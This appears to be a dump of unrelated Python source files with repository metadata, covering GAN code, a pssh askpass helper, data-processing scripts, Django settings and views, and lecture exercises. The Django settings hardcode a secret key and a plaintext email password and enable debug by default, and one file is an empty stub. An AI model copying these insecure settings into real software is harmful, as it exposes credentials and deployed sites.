image_encoding = tf.keras.layers.BatchNormalization()(image_encoding)
image_encoding = tf.keras.layers.LeakyReLU()(image_encoding)
# 4x4x64
image_encoding = tf.keras.layers.Flatten()(image_encoding)
# 1024
reference_image = tf.keras.Input(shape=(128, 128, 3,), name='reference_image')
reference_encoding = disc_encoder(reference_image)
# 4x4x512
reference_encoding = tf.keras.layers.Conv2D(64, (1, 1),
strides=(1, 1),
padding='same',
input_shape=(4, 4, 512))(reference_encoding)
reference_encoding = tf.keras.layers.BatchNormalization()(reference_encoding)
reference_encoding = tf.keras.layers.LeakyReLU()(reference_encoding)
# 4x4x64
reference_encoding = tf.keras.layers.Flatten()(reference_encoding)
# 1024
encoding = tf.keras.layers.concatenate([image_encoding, reference_encoding], axis=-1)
# 2048
# Classifier
encoding = tf.keras.layers.Dense(128, activation=tf.nn.leaky_relu)(encoding)
logits = tf.keras.layers.Dense(1)(encoding)
return tf.keras.Model(inputs=[image, reference_image], outputs=logits)
def generator_loss(generated_output):
return tf.losses.sigmoid_cross_entropy(tf.ones_like(generated_output), generated_output)
def discriminator_loss(real_output, generated_output):
real_loss = tf.losses.sigmoid_cross_entropy(multi_class_labels=tf.ones_like(real_output), logits=real_output)
generated_loss = tf.losses.sigmoid_cross_entropy(multi_class_labels=tf.zeros_like(generated_output), logits=generated_output)
total_loss = real_loss + generated_loss
return total_loss
def make_models():
gen_encoder, disc_encoder = make_encoders()
generator = make_generator_model(gen_encoder)
discriminator = make_discriminator_model(disc_encoder)
return generator, discriminator | [
"gnsnaider@gmail.com"
] | gnsnaider@gmail.com |
bac4166e2656f6b43ea25ab3081d9a3b5dddd470 | 69c27fd35685d9dc45a167f06e36fa9c89b7f1db | /psshlib/askpass_client.py | 5dc6dc654556bdd5f007a4806a3061a0328d0a2f | [
"BSD-3-Clause"
] | permissive | gyf19/parallel-ssh | 3476dd9e7966fdb4790ae2178010ef9b86cad01d | bf80ac747416a754da9f2a538692df4a088b1415 | refs/heads/master | 2020-05-24T14:56:07.201321 | 2016-01-04T12:47:48 | 2016-01-04T12:47:48 | 44,253,907 | 0 | 0 | null | 2015-10-14T14:39:48 | 2015-10-14T14:39:48 | null | UTF-8 | Python | false | false | 3,462 | py | #!/usr/bin/env python
# -*- Mode: python -*-
# Copyright (c) 2009, Andrew McNabb
"""Implementation of SSH_ASKPASS to get a password to ssh from pssh.
The password is read from the socket specified by the environment variable
PSSH_ASKPASS_SOCKET. The other end of this socket is pssh.
The ssh man page discusses SSH_ASKPASS as follows:
If ssh needs a passphrase, it will read the passphrase from the current
terminal if it was run from a terminal. If ssh does not have a terminal
associated with it but DISPLAY and SSH_ASKPASS are set, it will execute
the program specified by SSH_ASKPASS and open an X11 window to read the
passphrase. This is particularly useful when calling ssh from a .xsession
or related script. (Note that on some machines it may be necessary to
redirect the input from /dev/null to make this work.)
"""
import os
import socket
import sys
import textwrap
bin_dir = os.path.dirname(os.path.abspath(sys.argv[0]))
askpass_bin_path = os.path.join(bin_dir, 'pssh-askpass')
ASKPASS_PATHS = (askpass_bin_path,
'/usr/libexec/pssh/pssh-askpass',
'/usr/local/libexec/pssh/pssh-askpass',
'/usr/lib/pssh/pssh-askpass',
'/usr/local/lib/pssh/pssh-askpass')
_executable_path = None
def executable_path():
"""Determines the value to use for SSH_ASKPASS.
The value is cached since this may be called many times.
"""
global _executable_path
if _executable_path is None:
for path in ASKPASS_PATHS:
if os.access(path, os.X_OK):
_executable_path = path
break
else:
_executable_path = ''
sys.stderr.write(textwrap.fill("Warning: could not find an"
" executable path for askpass because PSSH was not"
" installed correctly. Password prompts will not work."))
sys.stderr.write('\n')
return _executable_path
def askpass_main():
"""Connects to pssh over the socket specified at PSSH_ASKPASS_SOCKET."""
verbose = os.getenv('PSSH_ASKPASS_VERBOSE')
# It's not documented anywhere, as far as I can tell, but ssh may prompt
# for a password or ask a yes/no question. The command-line argument
# specifies what is needed.
if len(sys.argv) > 1:
prompt = sys.argv[1]
if verbose:
sys.stderr.write('pssh-askpass received prompt: "%s"\n' % prompt)
if not prompt.strip().lower().endswith('password:'):
sys.stderr.write(prompt)
sys.stderr.write('\n')
sys.exit(1)
else:
sys.stderr.write('Error: pssh-askpass called without a prompt.\n')
sys.exit(1)
address = os.getenv('PSSH_ASKPASS_SOCKET')
if not address:
sys.stderr.write(textwrap.fill("pssh error: SSH requested a password."
" Please create SSH keys or use the -A option to provide a"
" password."))
sys.stderr.write('\n')
sys.exit(1)
sock = socket.socket(socket.AF_UNIX)
try:
sock.connect(address)
except socket.error:
_, e, _ = sys.exc_info()
message = e.args[1]
sys.stderr.write("Couldn't bind to %s: %s.\n" % (address, message))
sys.exit(2)
try:
password = sock.makefile().read()
except socket.error:
sys.stderr.write("Socket error.\n")
sys.exit(3)
print(password)
if __name__ == '__main__':
askpass_main()
| [
"amcnabb@mcnabbs.org"
] | amcnabb@mcnabbs.org |
715eb56d71c1ac53cf5f55734d8912762f615015 | acdae5a1563fe982b622bf78b65d963380f9b989 | /getcolumn.py | c252093219f4355f1a7a488e2e9f705463dbc8f8 | [] | no_license | pauliwu/LAMMPSExtractData | 4dd8bfa6052470b600e9d942a9ff2f30c8a4b084 | 048797f123bb21a8aa101beea494ea4f04124255 | refs/heads/master | 2021-05-29T05:56:56.887316 | 2011-10-24T13:50:56 | 2011-10-24T13:50:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,559 | py | #######################################################################################
## :: Extract specific column data and time from LAMMPS log files :: ##
## Usage: <python getcolumn.py> ##
## ##
## Brett Donovan 2011 ##
#######################################################################################
import os
import shutil
import sys
import re
def main(argv):
if len(argv) < 5:
sys.stderr.write("Usage: %s <io_filename> <column> <op_filename> <startn>\n" % (argv[0],))
return 1
if not os.path.exists(argv[1]):
sys.stderr.write("ERROR: filename %r was not found!\n" % (argv[1],))
return 1
if os.path.exists(argv[1]):
f = open(argv[1], "r")
w = open(argv[3], "w")
### Use the 'Step' word to locate the beginning of the rows we are interested in.
### From LAMMPS format we don't see numbers on the leftmost column after the 'Steps' header
collect = False
for line in f:
if "Step" in line:
collect = True
if (re.search('\d+', line)) and collect:
splitline = line.split()
if (re.search('\d+', splitline[0])):
if float(splitline[0]) > float(argv[4]):
newline = str(splitline[0]) + " " + str(splitline[int(argv[2])] + "\n")
w.write(newline)
f.close()
w.close()
return 0
if __name__ == "__main__":
sys.exit(main(sys.argv))
| [
"membrane3000@gmail.com"
] | membrane3000@gmail.com |
54d62dff4559c37642cd120d5a7827eec37549af | 6a982a8696e8213879544d52584ac21e3ba3e3ff | /indofoodv1/settings.py | 239cfd3fc6a16c92d9baccef0be0f543cfe5e8df | [] | no_license | Mattmont415/IndonesianCuisine-Django | 8eaf764308247c149ad872deb11d3f7971d187af | fb7029a1e187c42ffb532db6bd6a9d326f2b8ecd | refs/heads/main | 2023-02-17T16:21:12.235406 | 2021-01-10T02:00:12 | 2021-01-10T02:00:12 | 304,168,683 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,580 | py | """
Django settings for indofoodv1 project.
Generated by 'django-admin startproject' using Django 3.1.1.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.1/ref/settings/
"""
from pathlib import Path
import django_heroku
import os
import psycopg2
from django.core.mail import send_mail
import dj_database_url
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
#SECRET_KEY = 'e24ic&8-#z2z3rq3r2_64r5=*57bbr#gl1a-du%37xgf61&*qa'
SECRET_KEY = os.environ.get('DJANGO_SECRET_KEY','e24ic&8-#z2z3rq3r2_64r5=*57bbr#gl1a-du%37xgf61&*qa')
# SECURITY WARNING: don't run with debug turned on in production!
# DEBUG = True
DEBUG = os.environ.get('DJANGO_DEBUG', '') != 'False'
ALLOWED_HOSTS = ['floating-beyond-46802.herokuapp.com','127.0.0.1','0.0.0.0','192.168.1.33','192.168.1.163']
# Application definition
INSTALLED_APPS = [
'main',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'whitenoise.middleware.WhiteNoiseMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'indofoodv1.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'indofoodv1.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
#For heroku stuff
# Heroku: Update database configuration from $DATABASE_URL.
import dj_database_url
db_from_env = dj_database_url.config(conn_max_age=500)
DATABASES['default'].update(db_from_env)
# Password validation
# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
#
#
#
# Handling database
DATABASES['default'] = dj_database_url.config(conn_max_age=600, ssl_require=True)
# Internationalization
# https://docs.djangoproject.com/en/3.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
#The below email settings have been temporarily put on hold ***
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.1/howto/static-files/
# The absolute path to the directory where collectstatic will collect static files for deployment.
STATIC_ROOT = BASE_DIR / 'staticfiles' #. os.path.join(BASE_DIR, 'staticfiles')
# The URL to use when referring to static files (where they will be served from)
STATIC_URL = '/static/'
# Activate Django-Heroku.
django_heroku.settings(locals())
#Dealing with API to handle sending e-mails from the order page
SENDGRID_API_KEY = os.getenv('SENDGRID_API_KEY')
EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'
EMAIL_HOST = 'smtp.gmail.com'
EMAIL_PORT = 587
EMAIL_HOST_USER = 'tonisfabkitchen@gmail.com'
EMAIL_HOST_PASSWORD = 'ABCdef123456'
EMAIL_USE_TLS = True
#EMAIL_USE_SSL = False
#Email settings for sample thing
| [
"mattmont415@gmail.com"
] | mattmont415@gmail.com |
51d9e57f7a58b55d44ff489a9f2f39a58843a3b9 | 9a45316be7bf74190adf6d7e40a92ebf634fc312 | /upload/views.py | 943a111ea85ecbaf91370644536105cc58610cbc | [] | no_license | dapeige/Mirror_repo_test | 6e280c844653ac90079c05908eee8ab0898d3100 | 2646cf1a9386823529a2df02661a815804636d94 | refs/heads/master | 2021-08-11T07:11:52.066283 | 2016-10-21T05:50:47 | 2016-10-21T05:50:47 | 110,527,880 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,427 | py | from django.shortcuts import render
from django import forms
from django.http import HttpResponse, HttpResponseRedirect
from upload.models import *
import logging
# Create your views here.
# Normal user form , one field is username and the other is headImg .
class NormalUserForm(forms.Form):
isofile = forms.FileField()
# fill in blank fields and send a 'POST' request
def registerNormalUser(request):
if request.user.is_authenticated():
if request.method == "POST":
uf = NormalUserForm(request.POST, request.FILES)
if uf.is_valid():
version = uf.cleaned_data['isofile']
#get the info of the form
if str(version).endswith(".iso") == False:
return HttpResponse('please check the format')
#ownername = request.POST.get('username')
#logging.debug(ownername)
ownername = "admin"
isofile = uf.cleaned_data['isofile']
state = "pre"
release = "false"
#write in database
normalUser = NormalUser()
#normalUser.username = username
normalUser.version = version
normalUser.ownername = ownername
normalUser.isofile = isofile
normalUser.state = state
normalUser.release = release
normalUser.save()
# HttpResponse('Upload Succeed!')
return HttpResponseRedirect("/control_admin/")
else:
uf = NormalUserForm()
return render(request, 'upload/register.html', {'uf':uf})
else:
return HttpResponse('please log in the platform')
| [
"1130497582@qq.com"
] | 1130497582@qq.com |
8c994e8baded11dfb7211bd97cfef1a47f2fdf33 | 8fd314074713b3af02d68fd99fa5bf323283439f | /server/src/uds/dispatchers/__init__.py | 67ac9fa4e1883883983f5b8efeb5bf3c4d4ec13a | [] | no_license | spofa/openuds | 099f5d4b4eaf54064d3c2f22a04653d304552294 | a071ce5e3ed7a3e8973431cc2e884ff4219b8056 | refs/heads/master | 2021-07-04T14:16:13.810597 | 2017-09-21T13:50:07 | 2017-09-21T13:50:07 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,613 | py | # -*- coding: utf-8 -*-
#
# Copyright (c) 2012 Virtual Cable S.L.
# All rights reserved.
#
'''
@author: Adolfo Gómez, dkmaster at dkmon dot com
'''
from __future__ import unicode_literals
import logging
logger = logging.getLogger(__name__)
'''
Service modules for uds are contained inside this package.
To create a new service module, you will need to follow this steps:
1.- Create the service module, probably based on an existing one
2.- Insert the module package as child of this package
3.- Import the class of your service module at __init__. For example::
from Service import SimpleService
4.- Done. At Server restart, the module will be recognized, loaded and treated
The registration of modules is done locating subclases of :py:class:`uds.core.auths.Authentication`
.. moduleauthor:: Adolfo Gómez, dkmaster at dkmon dot com
'''
def __init__():
'''
This imports all packages that are descendant of this package, and, after that,
it register all subclases of service provider as
'''
import os.path
import pkgutil
import sys
# Dinamycally import children of this package. The __init__.py files must register, if needed, inside ServiceProviderFactory
pkgpath = os.path.dirname(sys.modules[__name__].__file__)
for _, name, _ in pkgutil.iter_modules([pkgpath]):
try:
logger.info('Loading dispatcher {}'.format(name))
__import__(name, globals(), locals(), [], -1)
except:
logger.exception('Loading dispatcher {}'.format(name))
logger.debug('Dispatchers initialized')
__init__()
| [
"dkmaster@dkmon.com"
] | dkmaster@dkmon.com |
c3525d6812dbbab8862d654706e21aef6b24d109 | 5237c643b5ab5df35609a6f90b9dd42c5b8285d6 | /python/discover/stats.py | 10c0289a481663681c3c2a70409b355abfc3a931 | [
"Apache-2.0"
] | permissive | Tesson98/DISCOVER | a89f3d05fbdc50f8652405635c6e30150145af34 | dbb1c3e61bb8dcfdd8f2454eac0fa05ff27a9294 | refs/heads/master | 2023-06-29T21:45:30.108285 | 2021-07-27T15:19:26 | 2021-07-27T16:13:04 | 574,865,196 | 1 | 0 | Apache-2.0 | 2022-12-06T08:42:35 | 2022-12-06T08:42:34 | null | UTF-8 | Python | false | false | 464 | py | import numpy
def false_discovery_rate(p, pi0=1.0):
if not 0 <= pi0 <= 1:
raise ValueError("Invalid value for pi0: %s. Legal values are between 0 and 1" % pi0)
nna = ~numpy.isnan(p)
q = numpy.full_like(p, numpy.nan)
p = p[nna]
i = numpy.arange(len(p), 0, -1)
o = p.argsort()[::-1]
ro = o.argsort()
q[nna] = numpy.minimum(1, numpy.minimum.accumulate(float(pi0) * len(p) / i * p[o])[ro])
return q
| [
"s.canisius@nki.nl"
] | s.canisius@nki.nl |
875e902874cd19eed9179c2b9f5951774b7ebdd3 | 083ca3df7dba08779976d02d848315f85c45bf75 | /ZumaGame2.py | 0233172d4172027141b217916e5abb0e6ac474f9 | [] | no_license | jiangshen95/UbuntuLeetCode | 6427ce4dc8d9f0f6e74475faced1bcaaa9fc9f94 | fa02b469344cf7c82510249fba9aa59ae0cb4cc0 | refs/heads/master | 2021-05-07T02:04:47.215580 | 2020-06-11T02:33:35 | 2020-06-11T02:33:35 | 110,397,909 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,067 | py | class Solution:
def findMinStep(self, board: str, hand: str) -> int:
def removeConsecutive(b):
j = 0
for i in range(len(b) + 1):
if i < len(b) and b[i] == b[j]:
continue
if i - j >= 3:
return removeConsecutive(b[: j] + b[i:])
j = i
return b
board = removeConsecutive(board)
if not board:
return 0
result = 100
s = set()
for i in range(len(hand)):
if hand[i] in s:
continue
s.add(hand[i])
for j in range(len(board)):
if board[j] == hand[i]:
t = self.findMinStep(board[: j] + hand[i] + board[j:], hand[:i] + hand[i + 1:])
if t != -1:
result = min(result, t + 1)
return -1 if result == 100 else result
if __name__ == '__main__':
board = input()
hand = input()
solution = Solution()
print(solution.findMinStep(board, hand))
| [
"jiangshen95@163.com"
] | jiangshen95@163.com |
d733b2d6bddf7049ffe24aa8556a7dc547af30e1 | fcdb6c042b6121034c39081e58048c72d4143d0c | /Python/92A/solve.py | e153f19ed6d639d42cfe805627b27edfa4007da8 | [] | no_license | s0nerik/CodeForces | 71ee927782c445aaa66f01474001315f18c7d300 | 5a8283d52e137567637103f30ac09e107f83994b | refs/heads/master | 2021-01-02T09:19:54.833638 | 2014-02-09T16:38:32 | 2014-02-09T16:38:32 | 11,886,506 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 364 | py | import sys
my_file = sys.stdin
#my_file = open("input.txt", "r")
line = list(map(int, my_file.readline().split()))
n, m = line[0], line[1]
def rec_check():
global m
if n == 1:
m = 0
return
for i in range(1, n+1):
if m >= i:
m -= i
else:
break
else:
rec_check()
rec_check()
print(m) | [
"sonerik@mail.ua"
] | sonerik@mail.ua |
97dc49eb077364d8a6342c2028d34a7ce6019fd5 | 043f2020671bd4d56d655fe43dd8ab636f2c328c | /jazz/migrations.jic/0026_auto_20200607_1348.py | f98fe97537b5a0ddd469405919c479ed4f26490b | [] | no_license | shobberlyridge/newjazz | 8b041182a5e2233f04f039aa13e5bf58cdfca939 | 716429c49e618e10e1e7b738b6f6fa1579816c5d | refs/heads/master | 2022-12-29T14:07:52.509446 | 2020-10-09T12:41:35 | 2020-10-09T12:41:35 | 291,448,288 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 515 | py | # Generated by Django 2.2.2 on 2020-06-07 12:48
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('jazz', '0025_auto_20200607_1347'),
]
operations = [
migrations.AlterField(
model_name='player',
name='lineup',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='toLineups', to='jazz.Lineup'),
),
]
| [
"edward@albany.me.uk"
] | edward@albany.me.uk |
94198ce8d21c25fcef5db54c4eed46f5b30d96de | ba1943ec012bda4c6c3e4d1c2002dc810949bbd7 | /django_project/urls.py | 0a268102048b5bd1784329c19586fb3ea74667e1 | [] | no_license | yadukrishnan369/firstproject | b7fdeea77effad8b966f63bc789820cefe14c0e7 | 8215c97b383823a3717e00556b321d27828ef8fc | refs/heads/master | 2023-08-12T16:13:55.054020 | 2021-09-28T04:38:27 | 2021-09-28T04:38:27 | 409,837,480 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 823 | py | """django_project URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path,include
urlpatterns = [
path('admin/', admin.site.urls),
path('application1/',include('application1.urls')),
]
| [
"yadukrish9656@gmail.com"
] | yadukrish9656@gmail.com |
d99ef0c51a5775993c6889109ec598b5b4d1e799 | b30871b60dab980d8f498e5cfcc16db4f5b0002f | /test/tst_scalarvar.py | ef6603cf23812b009f03c6953138a162da89207c | [
"MIT"
] | permissive | mathause/netCDF4p | e80e2beb1156f0e0142aa5c0875a408dacb8bd51 | 2f1a58dca482b00003e809e422233e95439e986e | refs/heads/master | 2021-01-25T07:18:59.982500 | 2018-02-26T14:13:15 | 2018-02-26T14:13:15 | 28,077,641 | 0 | 0 | null | 2015-06-23T20:54:33 | 2014-12-16T08:28:39 | Python | UTF-8 | Python | false | false | 1,814 | py | import sys
import unittest
import os
import tempfile
import numpy as NP
from numpy.testing import assert_almost_equal
import netCDF4p as netCDF4
import math
VAR_NAME='temp'
VAR_TYPE='f4'
VAR_VAL=math.pi
FILE_NAME = tempfile.mktemp(".nc")
GROUP_NAME = 'subgroup'
# test scalar variable creation and retrieval.
class ScalarVariableTestCase(unittest.TestCase):
def setUp(self):
self.file = FILE_NAME
rootgrp = netCDF4.Dataset(self.file, 'w')
# scalar variable.
temp = rootgrp.createVariable(VAR_NAME,VAR_TYPE)
#temp[:] = VAR_VAL
temp.assignValue(VAR_VAL)
subgroup = rootgrp.createGroup(GROUP_NAME)
tempg = subgroup.createVariable(VAR_NAME,VAR_TYPE)
tempg[:] = VAR_VAL
#tempg.assignValue(VAR_VAL)
rootgrp.close()
def tearDown(self):
# Remove the temporary file
os.remove(self.file)
def runTest(self):
"""testing scalar variables"""
# check dimensions in root group.
f = netCDF4.Dataset(self.file, 'r+')
v = f.variables[VAR_NAME]
# dimensions and shape should be empty tuples
self.assertTrue(v.dimensions == ())
self.assertTrue(v.shape == ())
# check result of getValue and slice
assert_almost_equal(v.getValue(), VAR_VAL, decimal=6)
assert_almost_equal(v[:], VAR_VAL, decimal=6)
g = f.groups[GROUP_NAME]
vg = g.variables[VAR_NAME]
# dimensions and shape should be empty tuples
self.assertTrue(vg.dimensions == ())
self.assertTrue(vg.shape == ())
# check result of getValue and slice
assert_almost_equal(vg.getValue(), VAR_VAL, decimal=6)
assert_almost_equal(vg[:], VAR_VAL, decimal=6)
f.close()
if __name__ == '__main__':
unittest.main()
| [
"mathias.hauser@env.ethz.ch"
] | mathias.hauser@env.ethz.ch |
c435ea2aed2ef69cd170ec050fa5852bc81317e1 | 79d078df94172f405739a9813f749ba9a30f144b | /week4/lecture 4.py | ac7e19154913e3a6aa3604b3879b527de4ec9c6c | [] | no_license | workinDead/Financial-Intelligence | 8300823cb3169125bcc198de8b65c1e611bc12df | a6daa85105904dea4863fc2efffa421c19900116 | refs/heads/master | 2020-07-28T21:11:47.193482 | 2019-09-19T11:43:33 | 2019-09-19T11:43:33 | 209,538,326 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 4,556 | py | #*********************************************#
#
# Review one Issue in Lecture 3
#
#*********************************************#
import numpy as np
import pandas as pd
from pandas import Series, DataFrame
alist = [1,2,3]
result = [(0 if c>2 else c) for c in alist]
print("alist:\n",result)
nlist = []
for c in alist:
if c > 2 :
nlist.append(0)
else:
nlist.append(c)
print(nlist)
arr = np.array([1,2,3])
result = [(0 if c>2 else c) for c in arr]
print("arr-to-list:\n",result)
arr = np.array([[1,2,3],[2,3,4]])
result =[(0 if c > 2 else c) for t in arr for c in t]
print(result)
result = np.reshape(result,(2,3))
print(result)
print(np.where(arr > 2, 0, arr))
#*********************************************#
#
# Pandas - DataFrame
#
#*********************************************#
data = {'state': ['Ohio', 'Ohio', 'Ohio', 'Nevada', 'Nevada'], 'year': [2000, 2001, 2002, 2001, 2002],
'pop': [1.5, 1.7, 3.6, 2.4, 2.9]}
frame = DataFrame(data)
print(frame)
print(DataFrame(data, columns=['year','state','pop']))
print(DataFrame(data, columns=['year','state','pop','debt'])) # debt doesn't exist
# A column in a DataFrame can be retrieved as a Series either by dict-like notation or by attribute:
print(frame.columns)
print(frame['state'])
print(frame.state)
print(frame)
#Rows can also be retrieved by position or name by a couple of methods, such as the ix indexing field
print(frame.ix[3])
frame['debt'] = 16.5
print(frame)
# For example, the empty 'debt' column could be assigned a scalar value or an array of values
frame['debt'] = np.arange(5.)
print(frame)
# When assigning lists or arrays to a column, the value’s length must match the length of the DataFrame.
# If you assign a Series, it will be instead conformed exactly to the DataFrame’s index, inserting missing values in any holes:
val = Series([-1.2, -1.5, -1.7], index=[2, 4, 5])
frame['debt'] = val
print(frame)
#Assigning a column that doesn’t exist will create a new column.
frame['eastern'] = 1
print(frame)
frame['marks'] = frame.state == 'Ohio' # if, select target value
del frame['eastern']
print(frame)
# Index Objects
obj = Series(range(3), index=['a', 'b', 'c'])
print(obj)
# Index objects are immutable index[1] = 'd'
# Reindexing
# Calling reindex on this Series rearranges the data according to the new index,
# introducing missing values if any index values were not already present:
obj2 = obj.reindex(['a', 'b', 'c', 'd', 'e'])
print(obj2)
obj2 = obj.reindex(['a', 'b', 'c', 'd', 'e'], fill_value=0)
print(obj2)
# For ordered data like time series, it may be desirable to do some interpolation or filling of values when reindexing.
# The method option allows us to do this, using a method such as ffill which forward fills the values:
obj3 = Series(['blue', 'purple', 'yellow'], index=[0, 2, 4])
print (obj3)
obj3 = obj3.reindex(range(6), method='ffill')
print(obj3)
# ffill or pad : Fill (or carry) values forward, bfill or backfill : Fill (or carry) values backward
# With DataFrame, reindex can alter either the (row) index, columns, or both.
frame = DataFrame(np.arange(9).reshape((3, 3)), index=['a', 'c', 'd'], columns=['Ohio', 'Texas', 'California'])
print(frame)
# When passed just a sequence, the rows are reindexed in the result:
frame2 = frame.reindex(['a', 'b', 'c', 'd'])
print(frame2)
# The columns can be reindexed using the columns keyword:
states = ['Texas', 'Utah', 'California']
frame = frame.reindex(columns=states)
print(frame)
# Both can be reindexed in one shot, though interpolation will only apply row-wise(axis 0)
frame = frame.reindex(index=['a', 'b', 'c', 'd'], method='ffill', columns=states)
print(frame)
# Dropping entries from an axis
obj = Series(np.arange(5.), index=['a', 'b', 'c', 'd', 'e'])
new_obj = obj.drop('c')
print(new_obj)
# With DataFrame, index values can be deleted from either axis:
data = DataFrame(np.arange(16).reshape((4, 4)), index=['Ohio', 'Colorado', 'Utah', 'New York'], columns=['one', 'two', 'three', 'four'])
# print(data)
# for i in data.items():
# print("items in data \n",i)
data.drop(['Colorado', 'Ohio'])
print(data)
data.drop('two', axis=1)
print(data)
# Summarizing and Computing Descriptive Statistics
print(data.describe())
print(data.sum())
print(data.sum(axis =1 ))
data.ix["ohio"] = None
print(data)
data1 = data.mean(axis=0, skipna=True)
print(data1)
#like idxmin and idxmax, return indirect statistics like the index value where the minimum or maximum values are attained:
print("idmax = \n",data.idxmax())
| [
"whole9681@gmail.com"
] | whole9681@gmail.com |
254b657a7c6193ccc61dad8b6f22843933c85cf8 | 315e513f4f7cd9f624b9ceb030fc451518387f8b | /threads/semaphore.py | 4f6965e95ed743b9900de976ae0cbe652d1d0e8c | [] | no_license | dmcyang163/test | 7f27aa97bd97411583d55e6f2a88ad79c67f6d40 | 5e4f9d5920eadfbd00ad8d70f380e5b8e1cbe679 | refs/heads/master | 2020-04-05T23:27:23.257017 | 2014-08-17T09:05:01 | 2014-08-17T09:05:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 952 | py | # encoding: UTF-8
import threading
import time
# 计数器初值为2
semaphore = threading.Semaphore(2)
def func():
# 请求Semaphore,成功后计数器-1;计数器为0时阻塞
print '%s acquire semaphore...' % threading.currentThread().getName()
if semaphore.acquire():
print '%s get semaphore' % threading.currentThread().getName()
time.sleep(4)
# 释放Semaphore,计数器+1
print '%s release semaphore' % threading.currentThread().getName()
semaphore.release()
t1 = threading.Thread(target=func)
t2 = threading.Thread(target=func)
t3 = threading.Thread(target=func)
t4 = threading.Thread(target=func)
t1.start()
t2.start()
t3.start()
t4.start()
time.sleep(2)
# 没有获得semaphore的主线程也可以调用release
# 若使用BoundedSemaphore,t4释放semaphore时将抛出异常
print 'MainThread release semaphore without acquire'
semaphore.release() | [
"dmc_yang@163.com"
] | dmc_yang@163.com |
b88def8d0aff40c00545deb95f50859b9e75f440 | ece08566d5909a3135835191faee91be73de15c8 | /sjq_gcn/utils/fulladder.py | 43db2f0f85fece6ea0c3bcdbb4efd648dbdc1960 | [] | no_license | shenjiangqiu/gcn_pymtl | e1c96671ca70d1db22117a2e6b786fef0aebecd8 | ba901ad2a6b8f3ac86c4264daea91f052f999db8 | refs/heads/master | 2023-06-04T16:19:24.721619 | 2021-06-23T15:46:25 | 2021-06-23T15:46:25 | 379,641,042 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 73 | py | from . import adder
from pymtl3 import *
class FullAdder(Component):
| [
"jshen2@mtu.edu"
] | jshen2@mtu.edu |
ca0321aca72bd390e64948f0e7f89acf174fef9a | 1d36f1a3c527e364b50cb73d0ce82b5b5db917e6 | /sdk/identity/azure-identity/azure/identity/aio/_credentials/certificate.py | 1b044a24c0e14bee3174e19fcfc646c2d828904f | [
"LicenseRef-scancode-generic-cla",
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | emreyalcin26/azure-sdk-for-python | 08c0a294e49e9c3a77867fb20ded4d97722ea551 | 6927458c7baa5baaf07c3b68ed30f6e517e87c9a | refs/heads/master | 2022-10-17T02:25:23.373789 | 2020-06-12T23:43:40 | 2020-06-12T23:43:40 | 272,001,096 | 1 | 0 | MIT | 2020-06-13T12:06:11 | 2020-06-13T12:06:11 | null | UTF-8 | Python | false | false | 2,745 | py | # ------------------------------------
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
# ------------------------------------
from typing import TYPE_CHECKING
from .base import AsyncCredentialBase
from .._internal import AadClient
from ..._internal import CertificateCredentialBase
if TYPE_CHECKING:
from typing import Any
from azure.core.credentials import AccessToken
